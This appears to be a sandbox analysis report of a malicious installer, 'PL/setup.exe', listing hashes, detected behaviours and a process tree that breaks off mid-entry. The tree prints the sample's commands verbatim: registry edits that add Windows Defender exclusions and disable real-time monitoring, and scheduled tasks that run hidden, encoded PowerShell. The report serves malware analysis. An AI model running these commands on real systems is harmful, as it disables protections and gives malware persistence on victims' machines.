Analysis

  • max time kernel
    97s
  • max time network
    100s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    06-11-2024 17:46

General

  • Target

    PL/setup.exe

  • Size

    7.3MB

  • MD5

    8b036a5a7406f7227ac65f44e1827fca

  • SHA1

    3a8499ecca8be3f69cc7163b03f3f499bbe8276f

  • SHA256

    85250ca9f679cdfebe009b7d66e409b330b35d6021e84e2ef7ceb0d64acdeff1

  • SHA512

    91cecf5c22bd32fe5cead41884773933b49791e57e00a369818d716dea34433bb558e9feb5b2dfc37f2b4b3488c05dcc50ef1b0f267936c2945308f2e9f32b5a

  • SSDEEP

    196608:91OeU0YzI5dCR00/4+cmJ/Dwami5rf0RejcO2h4I:3OxOCClgwa70Rej2h4I

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 36 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 2 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 12 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 1 IoCs
  • Drops file in System32 directory 19 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 13 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\PL\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1076
    • C:\Users\Admin\AppData\Local\Temp\7zS91E3.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2692
      • C:\Users\Admin\AppData\Local\Temp\7zS94E0.tmp\Install.exe
        .\Install.exe /S /site_id "525403"
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:1588
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Indirect Command Execution
          • Suspicious use of WriteProcessMemory
          PID:3068
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2452
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
                PID:3056
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                6⤵
                • System Location Discovery: System Language Discovery
                PID:1704
          • C:\Windows\SysWOW64\forfiles.exe
            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
            4⤵
            • Indirect Command Execution
            • Suspicious use of WriteProcessMemory
            PID:2712
            • C:\Windows\SysWOW64\cmd.exe
              /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2904
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                6⤵
                  PID:2724
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                  6⤵
                    PID:2792
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /CREATE /TN "gYppoSXqN" /SC once /ST 15:59:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                4⤵
                • Scheduled Task/Job: Scheduled Task
                PID:2776
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /run /I /tn "gYppoSXqN"
                4⤵
                • System Location Discovery: System Language Discovery
                PID:2608
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /DELETE /F /TN "gYppoSXqN"
                4⤵
                • System Location Discovery: System Language Discovery
                PID:2880
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /CREATE /TN "bJbhxhmwQPPePEjnjA" /SC once /ST 17:47:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\XoWamSN.exe\" sw /site_id 525403 /S" /V1 /F
                4⤵
                • Drops file in Windows directory
                • Scheduled Task/Job: Scheduled Task
                PID:1844
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {2AF98F94-9D1A-4E07-A631-9BCFD183D40E} S-1-5-21-3290804112-2823094203-3137964600-1000:VORHPBAB\Admin:Interactive:[1]
          1⤵
            PID:2652
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
              2⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2340
              • C:\Windows\system32\gpupdate.exe
                "C:\Windows\system32\gpupdate.exe" /force
                3⤵
                  PID:2668
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                2⤵
                • Command and Scripting Interpreter: PowerShell
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1120
                • C:\Windows\system32\gpupdate.exe
                  "C:\Windows\system32\gpupdate.exe" /force
                  3⤵
                    PID:2260
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                  2⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:796
                  • C:\Windows\system32\gpupdate.exe
                    "C:\Windows\system32\gpupdate.exe" /force
                    3⤵
                      PID:1516
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                    2⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Drops file in System32 directory
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2468
                    • C:\Windows\system32\gpupdate.exe
                      "C:\Windows\system32\gpupdate.exe" /force
                      3⤵
                        PID:3052
                  • C:\Windows\system32\gpscript.exe
                    gpscript.exe /RefreshSystemParam
                    1⤵
                      PID:2292
                    • C:\Windows\system32\taskeng.exe
                      taskeng.exe {8777F753-B404-4D40-9E64-AE96C8558804} S-1-5-18:NT AUTHORITY\System:Service:
                      1⤵
                        PID:2552
                        • C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\XoWamSN.exe
                          C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\XoWamSN.exe sw /site_id 525403 /S
                          2⤵
                          • Executes dropped EXE
                          • Drops file in System32 directory
                          • System Location Discovery: System Language Discovery
                          PID:560
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /CREATE /TN "gvsTcAnUJ" /SC once /ST 09:11:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                            3⤵
                            • Scheduled Task/Job: Scheduled Task
                            PID:1180
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /run /I /tn "gvsTcAnUJ"
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:2100
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /DELETE /F /TN "gvsTcAnUJ"
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:1108
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                            3⤵
                              PID:1552
                              • C:\Windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                4⤵
                                • Modifies Windows Defender Real-time Protection settings
                                PID:1676
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:2232
                              • C:\Windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                4⤵
                                • Modifies Windows Defender Real-time Protection settings
                                • System Location Discovery: System Language Discovery
                                PID:1384
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /CREATE /TN "gcYxblQqe" /SC once /ST 07:11:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                              3⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:960
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /run /I /tn "gcYxblQqe"
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:2196
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /DELETE /F /TN "gcYxblQqe"
                              3⤵
                                PID:1716
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
                                3⤵
                                  PID:2004
                                  • C:\Windows\SysWOW64\reg.exe
                                    REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
                                    4⤵
                                    • Windows security bypass
                                    PID:2576
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
                                  3⤵
                                    PID:340
                                    • C:\Windows\SysWOW64\reg.exe
                                      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
                                      4⤵
                                      • Windows security bypass
                                      • System Location Discovery: System Language Discovery
                                      PID:2688
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2240
                                    • C:\Windows\SysWOW64\reg.exe
                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2924
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
                                    3⤵
                                      PID:2188
                                      • C:\Windows\SysWOW64\reg.exe
                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2912
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /C copy nul "C:\Windows\Temp\biwNYXhGTKCQxjLv\jmCEXvdp\WLZIKUVlZjyBdxVw.wsf"
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3056
                                    • C:\Windows\SysWOW64\wscript.exe
                                      wscript "C:\Windows\Temp\biwNYXhGTKCQxjLv\jmCEXvdp\WLZIKUVlZjyBdxVw.wsf"
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      • Modifies data under HKEY_USERS
                                      PID:2452
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2748
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        • System Location Discovery: System Language Discovery
                                        PID:2744
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        • System Location Discovery: System Language Discovery
                                        PID:2772
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        • System Location Discovery: System Language Discovery
                                        PID:2628
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        • System Location Discovery: System Language Discovery
                                        PID:2936
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        • System Location Discovery: System Language Discovery
                                        PID:2252
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        • System Location Discovery: System Language Discovery
                                        PID:692
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        • System Location Discovery: System Language Discovery
                                        PID:2292
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2844
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        • System Location Discovery: System Language Discovery
                                        PID:2980
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        • System Location Discovery: System Language Discovery
                                        PID:2436
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2964
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        • System Location Discovery: System Language Discovery
                                        PID:2956
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        • System Location Discovery: System Language Discovery
                                        PID:1932
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        • System Location Discovery: System Language Discovery
                                        PID:1664
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2528
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2076
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1000
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1316
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                          PID:1736
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                            PID:1608
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                              PID:596
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                                PID:1492
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:64
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:1976
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:32
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:600
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:64
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:1884
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:32
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2592
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:64
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:716
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:32
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:1400
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:64
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:1580
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:1708
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:1544
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /CREATE /TN "gGXdnLUiE" /SC once /ST 14:40:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:2416
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /run /I /tn "gGXdnLUiE"
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:2380
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /DELETE /F /TN "gGXdnLUiE"
                                              3⤵
                                                PID:2568
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2924
                                                • C:\Windows\SysWOW64\reg.exe
